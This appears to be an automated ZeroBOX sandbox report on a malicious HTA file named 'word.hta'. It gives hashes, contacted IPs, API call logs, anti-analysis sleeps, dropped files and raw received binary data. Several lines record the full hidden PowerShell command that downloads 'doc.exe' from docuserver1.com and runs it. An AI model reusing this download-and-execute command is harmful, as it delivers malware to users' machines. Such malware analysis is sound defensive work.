Summary | ZeroBOX

word.hta

Antivirus Escalate priviledges ScreenShot AntiDebug PE File DLL PE32 AntiVM
Category Machine Started Completed
FILE s1_win7_x6401 June 24, 2021, 10:49 p.m. June 24, 2021, 10:51 p.m.
Size 538.0B
Type HTML document, ASCII text, with CRLF line terminators
MD5 5562d4b0b0707245170b795a79422da3
SHA256 dafcd9bc5e53c080eb9d4054c4b5cb802a2a218068448613b1487cc63c6da031
CRC32 FB0AEB71
ssdeep 12:c6QclfhTD5LWy0cqSPsnWRcYnf37kYtzNk6ULWzB7BYMSe7k:csphCdcq96frkYcpE1YMdg
Yara
  • Antivirus - Contains references to security software

IP Address Status Action
164.124.101.2 Active Moloch
3.142.81.166 Active Moloch
66.45.232.203 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00664df8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00665378
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00665378
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00665378
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00665578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00665578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00665578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00665578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00665578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00665578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00664db8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00664db8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00664db8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00665378
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00665378
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00665378
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006649b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00665378
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00665378
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00665378
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00665378
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00665378
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00665378
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00665378
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006656f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006656f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006656f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006656f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006656f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006656f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006656f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006656f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006656f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006656f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006656f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006656f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006656f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006656f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00665638
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00665638
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header suspicious_request GET http://docuserver1.com/d/doc.exe
request GET http://docuserver1.com/d/doc.exe
request GET http://docuserver1.com/ng.txt
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1908
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72192000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 2031616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029f0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ba0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6ee81000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0261a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6ee82000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02612000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ba1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ba2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0270a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0271b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02717000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0261b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02702000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02715000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0270c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02890000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0271c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02703000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02704000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02705000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02706000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02707000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02708000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02709000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ada000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02adb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02adc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02add000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ade000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02adf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b41000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b42000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b43000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description EJNFTE.Exe tried to sleep 132 seconds, actually delayed analysis time by 132 seconds
file C:\Users\test22\AppData\Roaming\Temp\word.exe
file C:\Users\test22\AppData\Local\Temp\nsf752B.tmp\System.dll
file C:\Users\test22\AppData\Local\Temp\EJNFTE.Exe
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://docuserver1.com/d/doc.exe',$env:Temp+'\EJNFTE.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\EJNFTE.Exe')
cmdline powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://docuserver1.com/d/doc.exe',$env:Temp+'\EJNFTE.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\EJNFTE.Exe')
file C:\Users\test22\AppData\Local\Temp\nsf752B.tmp\System.dll
file C:\Users\test22\AppData\Roaming\Temp\word.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://docuserver1.com/d/doc.exe',$env:Temp+'\EJNFTE.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\EJNFTE.Exe')
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received tq@D$PWÿpq@jUUÿt$ ÿt$ Uÿ5x6Bÿˆq@Uÿv èÕÿÿ9-l6Bu\jÿ5x6Bÿ`r@hèÃëÿ5x6Bÿèq@ÿ5høA‰-¨>BWÿlq@9- Bu9-x6Btj Wÿ`r@Ç B3À_^][ƒÄƒ|$xuÿl6Bjÿt$hÿ5¨>BÿDr@Âÿt$ jèeP‹D$ èPÿt$ èΠÿt$ÿ5˜Bÿ<r@Âjÿt$j(ÿ5¨>BÿDr@¡x6B…Àtjjÿt$ PÿDr@ÂU‹ìƒì ‹EVÍþÿÿƒø‡Žjëÿuÿq@‹ð…öt}öF‹W‹=Œq@tPÿ×öFt Pÿu ÿTp@ÿvÿu ÿPp@‹FöF‰EøtPÿ׉EøöF_t Pÿu ÿ<p@öFt!‹F‰Eô‹F …ÀtPÿDp@EôPÿHp@‰F ‹F ë3À^É U‹ì‹E‹ dôAÿuÈQÿu ÿ¼p@ÿu è-‹M‰dôA3À]ÂU‹ìƒì } SVW… ‹]‹{0…ÿ}‹ |6B½+ȋ9¡Ø>Bÿs4øj"¾‰E‹Cÿuƒeø‹ðG÷ÖÁîƒæƒà‰}ôÇEü,@@ ðèLþÿÿÿs8j#ÿuè?þÿÿ3Àj…ö”À Pÿuÿœq@VèCþÿÿhèÿuÿ,r@‹ØSè@þÿÿ‹5Dr@jjh[SÿÖ¡°>B‹@h…À} ÷ØPÿŒq@PjhCSÿÖhjhESÿփ%dôAWè!Pjh5Sÿ֍EôPÿuhISÿփ%€B3Àéa} ‹,r@‹5Dr@uZ‹EÁèf…À….3À9€B… ‹ püAyö „PPhðh ÿuÿÓPÿ֋ƒàƒáþP ȉèMýÿÿèùƒ} N…ÊhèÿuÿӋ} ur ui‹O‹W‰Mø+ʁù‰UôÇEü@.BsLMôQjhKPÿ֋=˜q@hjÿ׋”q@PÿÓjjjÿuühä‘@ÿuÿ\q@hjÿ×PÿӋ}uK uBƒ ujjhÿ5¨>Bÿփujjjÿ5¨>BÿÖ3À@ë} uÿ€B‹}Wÿuÿu è›üÿÿ_^[Ƀ=,?B¡`ôAu¡˜BjjhôPÿDr@ÃU‹ì} V‹uu&ÿv0jÿuèìûÿÿ‹F<Áà @BPhèÿuèÀVÿuÿu è.üÿÿ^]ÂU‹ìƒìH¡püASV‰Eà‹p<‹@8Áæ Æ@B} W‰Eü»ûu VSè}Vè4} ur‹}SWÿ,r@V‰Eøè…ÀtVè2…ÀuVè”V‰=x6Bÿuøÿôq@‹Eÿp4jWè5ûÿÿ‹Eÿp0jWè'ûÿÿÿuøèTûÿÿj舅À„njÿuøÿЁ} …Ï·E;Ãu‹MÁéfù…AÇE =é…¤j3ÀY}¼ÿuüó«‹E¿ BhpøA‰E¸‰}ÀÇE̋F@‰uÐè‰EčE¸PÇEÈAÿTq@…ÀtVPÿxr@V辡°>B‹€…Àt(þ”Bu PjèÎW¿@.BWÿðp@…ÀtWVè°ÿŒBVSÿuè#ëÇE } t } …uƒeüƒeøVSèûVè$…ÀuÇEü¿hôAVWè93ÛSèS;ÉEôt53À;Çt-EäPEìPEØPWÿUô…Àul…Ûtf!Wè=‹ØK;ßfÇ\uÓ3ÛVWèîWèo;Ãt€ EÜPEôPEèPEðPWÿÀp@…Àt:‹Eð¾¯EèVÿuôPÿ0q@‹øÇEøë ‹}؋EÜ¬Ç Áè ÇEø3Ûë‹} ¾jè½9]øt ;øsÇEü‹ |6B9Yt+Pjûhÿèà9]øt WjüVèÒëhXôAVÿuèÖ ‹Eü;ãD?Bu jèÉÍÿÿ‰Eü‹Eà…pt‰]ü3À9]ü”ÀPèÜøÿÿ9]üu 9ŒBuè{üÿÿ‰ŒBÿuÿuÿu èûøÿÿ_^[ÉÂU‹ìƒ} V‹5Dr@uÿuhûèc ÿujhfÿuÿփ} u-ÿuÿuÿPq@…Àtjè7Íÿÿ…Àu@ë3ÀPjheÿuÿÖ3À^]ÂU‹ìƒì@SV‹uWjþ_jÜ[sj _jÝ[þsjÞ3ÿ[þ33ÿÿs3À‹Ï@jÓàY™÷ùðEàjßPèHPEÀSPè=P‹Æ%ÿÿÿ‹Ïj 3ҍ€ÀÓèY÷ñ‹ÏÓîRVhì‘@¾ Bÿu Vè V‹øèøøWÿr@ƒÄVÿuÿ5x6Bèf _^[É ‹Ì>B‹ È>B3À…ÒtVöAt‹t$±ÁJuê^ÂU‹ìƒì8V‹5Dr@W‹}jj h Wÿփ} t<ÿ q@¿ÈÁè¿À‰EôEðPW‰Mðÿpq@EðPjhWÿÖöEøfuƒÈÿë‹Eü‰E̍EÈPjh WÇEÈÿ֋Eì_^ÉÂU‹ìƒìPSV‹5,r@WhùÿuÿÖh‰Eøÿuÿ֋È>B‹5Dr@‰Eü¡°>B”3ÿ} ‰]ä‰Eð…"‹Ej£?B¡Ì>B[‰}èÁàPj@‰]ôÿq@jn£”Bÿ5 >Bÿ¤q@ƒ ˆBÿhTN@jü‰Eìÿuüÿ0r@Wjj!jj£Bÿ4p@hÿÿ£|BÿuìPÿ(p@ÿ5|BSh ÿuüÿÖWWhÿuüÿփø} WjhÿuüÿÖÿuìÿDp@3ۋEð‹˜;Çt'ƒû t‰}ôPWèPWhCÿuøÿÖSPhQÿuøÿÖCƒû!|ɋ}‹]ôÿtŸ0jÿuèuõÿÿÿtŸ4jÿuègõÿÿ3ÿ3Û9=Ì>BŽÄ‹EäP‰UìB€8„‰Eȋj ‹ÐY‰]°#ÑÇE´ÿÿ¨ÇE¸ ‰Mĉ}܉UÀt8E°ÇE¸MPjhÇEØÿuüÿ֋ ”BÇE艹¡”B‹¸ë.¨tSjh ÿuüÿ֋ØëE°Pjhÿuüÿ֋ ”B‰¹‹UìGÂ;=Ì>B‰UìŒKÿÿÿƒ}èujðÿuüÿq@$ûPjðÿuüÿ0r@ƒ}ôujÿuøÿ`r@ÿuøè–ôÿÿéƒÿuüè‰ôÿÿ‹]ä3ÿ} u3ɉ}AÇE ‰Më‹Mƒ} N¸t 9E …ç9E ‰Môt y…Òö¹>Buv9E t ‹Mƒyþuh3É9E •ÁQÿuüè›üÿÿ;Ç|S‹ÈiɍT‹ 